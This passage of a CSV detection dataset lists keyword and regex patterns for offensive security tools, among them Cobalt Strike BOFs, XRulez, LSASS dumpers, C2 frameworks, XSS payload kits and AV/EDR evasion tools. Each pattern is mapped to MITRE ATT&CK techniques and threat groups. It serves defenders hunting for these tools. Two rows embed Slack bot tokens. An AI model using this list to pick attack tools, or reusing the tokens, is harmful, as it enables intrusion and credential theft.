Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","N/A","10","10","637","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z","63269" "*xor-bin.py *.exe*",".{0,1000}xor\-bin\.py\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","63270" "*XorEncoder.py*",".{0,1000}XorEncoder\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","63271" "*XorEncryptPayload.cpp*",".{0,1000}XorEncryptPayload\.cpp.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","63272" "*XorEncryptPayload.exe*",".{0,1000}XorEncryptPayload\.exe.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. 
This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","63273" "*XorEncryptPayload.vcxproj*",".{0,1000}XorEncryptPayload\.vcxproj.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","63274" "*XOR-Payloads.py*",".{0,1000}XOR\-Payloads\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","63275" "*xoxb-2144924547920-3382587054001-2xPrUBj0D8yf0D5BNDPh3nwY*",".{0,1000}xoxb\-2144924547920\-3382587054001\-2xPrUBj0D8yf0D5BNDPh3nwY.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - 
T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","slack id","10","10","N/A","N/A","N/A","N/A","63276" "*xoxb-2144924547920-3393858142400-qEIcN8hBt0WgwRaJImILqMAj*",".{0,1000}xoxb\-2144924547920\-3393858142400\-qEIcN8hBt0WgwRaJImILqMAj.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","slack id","10","10","N/A","N/A","N/A","N/A","63277" "*xpipe \\*",".{0,1000}xpipe\s\\\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - 
Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","0","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","63278" "*xpipe*lsass*",".{0,1000}xpipe.{0,1000}lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 
Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","1","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","63279" "*xpipe.cna*",".{0,1000}xpipe\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/boku7/xPipe","1","1","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","63280" "*xpn*ntlmquic*",".{0,1000}xpn.{0,1000}ntlmquic.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","63281" "*xpn/AppProxyC2*",".{0,1000}xpn\/AppProxyC2.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","1","N/A","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","63282" "*xrdp.c*",".{0,1000}xrdp\.c.{0,1000}","offensive_tool_keyword","xrdp","xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. 
iOS and Android).can be used by attacker","T1021.003 - T1021.002","TA0003 - TA0006 - TA0011","N/A","GOLD EVERGREEN - Common Raven","Exploitation tool","https://github.com/neutrinolabs/xrdp","1","0","N/A","N/A","N/A","10","6085","1722","2025-04-22T13:58:59Z","2011-04-25T14:31:17Z","63283" "*Xre0uS/MultiDump*",".{0,1000}Xre0uS\/MultiDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","63284" "*xRET2pwn/PickleC2*",".{0,1000}xRET2pwn\/PickleC2.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","63285" "*XRMod_h64e.exe*",".{0,1000}XRMod_h64e\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63286" "*Xrulez + XRMod.rwdi.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.rwdi\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63287" "*Xrulez + 
XRMod.x64.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.x64\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63288" "*Xrulez + XRMod.x86.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.x86\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63289" "*XRulez binaries.zip*",".{0,1000}XRulez\sbinaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63290" "*XRulez.%2B.XRMod.rwdi.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.rwdi\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63291" 
"*XRulez.%2B.XRMod.x64.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.x64\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63292" "*XRulez.%2B.XRMod.x86.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.x86\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63293" "*XRulez.+.XRMod.x64.binaries*",".{0,1000}XRulez\.\+\.XRMod\.x64\.binaries.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63294" "*XRulez.exe *",".{0,1000}XRulez\.exe\s.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63295" "*XRulez_h64d.dll*",".{0,1000}XRulez_h64d\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious 
rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63296" "*XRulez_h64e.exe*",".{0,1000}XRulez_h64e\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63297" "*XRulez_rwdi86d.dll*",".{0,1000}XRulez_rwdi86d\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63298" "*XRulezDll_rwdi64.dll*",".{0,1000}XRulezDll_rwdi64\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","63299" "*xs.exe -connect *",".{0,1000}xs\.exe\s\-connect\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - 
T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","63300" "*xscreensaver_log_priv_esc*",".{0,1000}xscreensaver_log_priv_esc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63301" "*xshell_xftp_password.md*",".{0,1000}xshell_xftp_password\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63302" "*XSpear -u *",".{0,1000}XSpear\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63303" "*xspy -display*",".{0,1000}xspy\s\-display.{0,1000}","offensive_tool_keyword","xspy","Keylogger Monitors keystrokes even the keyboard is grabbed.","T1056 - T1059 - T1007 - T1113","TA0006 - TA0002 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mnp/xspy/blob/master/xspy.c","1","0","N/A","N/A","N/A","1","25","14","2018-03-19T12:16:25Z","2011-07-26T18:37:00Z","63304" "*xsrfprobe -u *",".{0,1000}xsrfprobe\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63305" "*xsser -u * -g */login?password=* 
--Coo*",".{0,1000}xsser\s\-u\s.{0,1000}\s\-g\s.{0,1000}\/login\?password\=.{0,1000}\s\-\-Coo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63306" "*XSS-labs*",".{0,1000}XSS\-labs.{0,1000}","offensive_tool_keyword","xss-labs","small set of PHP scripts to practice exploiting XSS and CSRF injection vulns","T1059.003 - T1190 - T1600","TA0002 - TA0007 - ","N/A","N/A","Vulnerability Scanner","https://github.com/paralax/xss-labs","1","1","N/A","N/A","N/A","1","60","27","2017-12-22T19:38:15Z","2016-03-24T19:43:37Z","63307" "*XSS-Payloads*",".{0,1000}XSS\-Payloads.{0,1000}","offensive_tool_keyword","XSS-Payloads","A fine collection of selected javascript payloads.","T1059 - T1068 - T1071 - T1506","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","http://www.xss-payloads.com/","1","1","N/A","N/A","N/A","8","N/A","N/A","N/A","N/A","63308" "*xssrays.js*",".{0,1000}xssrays\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63309" "*xssrays.rb*",".{0,1000}xssrays\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63310" "*xssrays_spec.rb*",".{0,1000}xssrays_spec\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63311" "*xssraysdetail.rb*",".{0,1000}xssraysdetail\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63312" "*xssraysscan.rb*",".{0,1000}xssraysscan\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63313" "*XSStrike*",".{0,1000}XSStrike.{0,1000}","offensive_tool_keyword","XSStrike","Advanced XSS detection and exploitation suite.","T1189","TA0001","N/A","N/A","Exploitation tool","https://github.com/UltimateHackers/XSStrike","1","0","N/A","N/A","N/A","10","13851","1957","2025-03-17T11:26:56Z","2017-06-26T07:24:44Z","63314" "*xsukax-Wordlist-All.7z*",".{0,1000}xsukax\-Wordlist\-All\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","63315" "*xterm -e masscan*",".{0,1000}xterm\s\-e\smasscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","63316" "*xtr4nge/FruityC2*",".{0,1000}xtr4nge\/FruityC2.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","63317" "*xvt-void/EnableAllTokenPrivs*",".{0,1000}xvt\-void\/EnableAllTokenPrivs.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable 